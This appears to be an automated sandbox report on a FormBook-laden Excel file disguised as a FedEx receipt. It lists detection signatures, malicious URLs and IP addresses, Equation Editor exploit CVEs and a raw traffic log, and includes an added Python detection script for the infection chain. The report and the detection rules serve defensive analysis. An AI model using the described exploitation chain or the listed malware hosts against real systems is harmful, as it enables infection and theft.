Windows Analysis Report
FedEx Receipt_53065724643.xls

Overview

General Information

Sample name: FedEx Receipt_53065724643.xls
Analysis ID: 1465865
MD5: 4bb5a21106d460a7e9f63d44e47359cc
SHA1: bb87ff08d79ebb57f97f97407db083bb13bb580d
SHA256: adf19fed5bdfe80fc084a7ff1ad2ba59dc986dfe5b7dd7d2864c129bce51c0a0
Tags: FedEx, xls

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell Download and Execute IEX
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Powershell download and execute
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious Excel or Word document
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormally high CPU usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Excel Network Connections
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: http://ilang.in/BrlcByX Avira URL Cloud: Label: malware
Source: http://ilang.in/BrlcB Avira URL Cloud: Label: malware
Source: http://ilang.in/ Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ima.imim.im.imim[1].doc Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD4612E1.doc Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3A50CEE2-6F27-47C4-9BA8-0FD0C2B7AD90}.tmp Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: FedEx Receipt_53065724643.xls Virustotal: Detection: 29%
Source: FedEx Receipt_53065724643.xls ReversingLabs: Detection: 28%
Source: Yara match File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: FedEx Receipt_53065724643.xls Joe Sandbox ML: detected

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 23.95.235.16 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown HTTPS traffic detected: 194.163.41.117:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.163.41.117:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: RunPE.pdb source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.479671681.0000000006221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.473348912.0000000000280000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp
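
The execution chain this report records (EXCEL -> WINWORD -> EQNEDT32 -> wscript -> powershell -> RegAsm, with EQNEDT32.EXE itself connecting out to 23.95.235.16:80) is what a detection engineer would want to turn into rules. The following is an added example, not part of the sandbox report or of Joe Sandbox: a small Python detection pass over Sysmon-style process-creation (event ID 1) and network-connection (event ID 3) records. The events are constructed to mirror the report's process tree; the process GUIDs, command lines and the stage.vbs path are assumptions for the example, not values taken from the analysis.

```python
"""Process-chain and network detection over Sysmon-style events.

Added example, not part of this sandbox report. It encodes the execution
chain the report records (EXCEL -> WINWORD -> EQNEDT32 -> wscript ->
powershell -> RegAsm, with EQNEDT32 connecting out on TCP/80) as a handful
of parent/child and network rules and runs them over constructed events.
Field names follow Sysmon event IDs 1 (process create) and 3 (network
connect); the GUIDs, command lines and script path are made up.
"""
from __future__ import annotations

import ntpath

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# .NET utilities commonly hollowed out as hosts for injected payloads.
INJECTION_HOSTS = {"regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe"}


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path (works off-Windows too)."""
    return ntpath.basename(image).lower()


def ancestry(guid: str, index: dict) -> list[str]:
    """Follow ParentProcessGuid links and return the chain root -> leaf."""
    names, seen = [], set()
    while guid in index and guid not in seen:
        seen.add(guid)
        names.append(basename(index[guid]["Image"]))
        guid = index[guid]["ParentProcessGuid"]
    return names[::-1]


def detect(events: list[dict]) -> list[dict]:
    """Return one finding per rule hit: {rule, image, chain} or {rule, image, dest}."""
    index = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    findings = []

    for e in events:
        image = basename(e["Image"])
        if e["EventID"] == 1:
            parent_ev = index.get(e["ParentProcessGuid"])
            parent = basename(parent_ev["Image"]) if parent_ev else ""
            chain = " -> ".join(ancestry(e["ProcessGuid"], index))
            hits = []
            # Office activating the Equation Editor via COM ("-Embedding") is the
            # classic CVE-2017-11882 / CVE-2018-0802 trigger.
            if image == "eqnedt32.exe" and parent in OFFICE_APPS:
                hits.append("office_spawns_equation_editor")
            # EQNEDT32.EXE has no legitimate reason to spawn anything at all.
            if parent == "eqnedt32.exe":
                hits.append("equation_editor_child_process")
            if parent in SCRIPT_HOSTS and image == "powershell.exe":
                hits.append("script_host_spawns_powershell")
            if parent == "powershell.exe" and image in INJECTION_HOSTS:
                hits.append("powershell_spawns_injection_host")
            findings += [{"rule": r, "image": image, "chain": chain} for r in hits]
        elif e["EventID"] == 3 and image == "eqnedt32.exe":
            # The Equation Editor never needs the network.
            findings.append({"rule": "equation_editor_network_connection",
                             "image": image,
                             "dest": f'{e["DestinationIp"]}:{e["DestinationPort"]}'})
    return findings


def _proc(guid, parent, image, cmdline):
    return {"EventID": 1, "ProcessGuid": guid, "ParentProcessGuid": parent,
            "Image": image, "CommandLine": cmdline}


# Constructed events mirroring the report's process tree (not real telemetry).
EVENTS = [
    _proc("p1", None, r"C:\Windows\explorer.exe", "explorer.exe"),
    _proc("p2", "p1", r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
          r'"EXCEL.EXE" "C:\Users\user\Desktop\FedEx Receipt_53065724643.xls"'),
    _proc("p3", "p2", r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
          '"WINWORD.EXE"'),
    _proc("p4", "p3", r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
          '"EQNEDT32.EXE" -Embedding'),
    {"EventID": 3, "ProcessGuid": "p4",
     "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "DestinationIp": "23.95.235.16", "DestinationPort": 80},
    _proc("p5", "p4", r"C:\Windows\SysWOW64\wscript.exe",
          r"wscript.exe C:\Users\user\AppData\Local\Temp\stage.vbs"),  # path assumed
    _proc("p6", "p5", r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -ep bypass -w hidden -enc <base64>"),
    _proc("p7", "p6", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
          "RegAsm.exe"),
]

# Constructed benign baseline: Excel printing through the spooler helper.
BENIGN_EVENTS = [
    _proc("b1", None, r"C:\Windows\explorer.exe", "explorer.exe"),
    _proc("b2", "b1", r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE", "EXCEL.EXE"),
    _proc("b3", "b2", r"C:\Windows\splwow64.exe", "splwow64.exe"),
]

if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f["rule"], "|", f.get("chain") or f.get("dest"))
```

Each hit carries the full ancestry chain rather than just the parent, because the EQNEDT32 child-process rule on its own is the one worth paging on (the Equation Editor should never spawn anything), while the wscript -> powershell and powershell -> RegAsm rules are only high-confidence when the chain above them leads back to an Office document.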

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 7_2_036406FA LoadLibraryW, 7_2_036406FA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 7_2_036407D9 ShellExecuteW,ExitProcess, 7_2_036407D9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 7_2_036407AB URLDownloadToFileW,ShellExecuteW,ExitProcess, 7_2_036407AB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 7_2_036407FE ExitProcess, 7_2_036407FE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 7_2_036407C4 ShellExecuteW,ExitProcess, 7_2_036407C4
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 7_2_03640615 ExitProcess, 7_2_03640615
Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: global traffic DNS query: name: ilang.in (8 queries)
Source: global traffic DNS query: name: uploaddeimagens.com.br (1 query, between the sixth and seventh ilang.in query)
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443 (107 outbound segments logged)
Source: global traffic TCP traffic: 192.168.2.22:49163 <-> 194.163.41.117:80 (5 outbound, 3 inbound segments logged)
Source: global traffic TCP traffic: 192.168.2.22:49164 <-> 23.95.235.16:80 (199 segments logged in both directions)
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80 (1 segment logged)
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80 (1 segment logged)
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 23.95.235.16:80 (1 segment logged)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443 (9 outbound segments logged)
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443 (8 outbound segments logged)
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
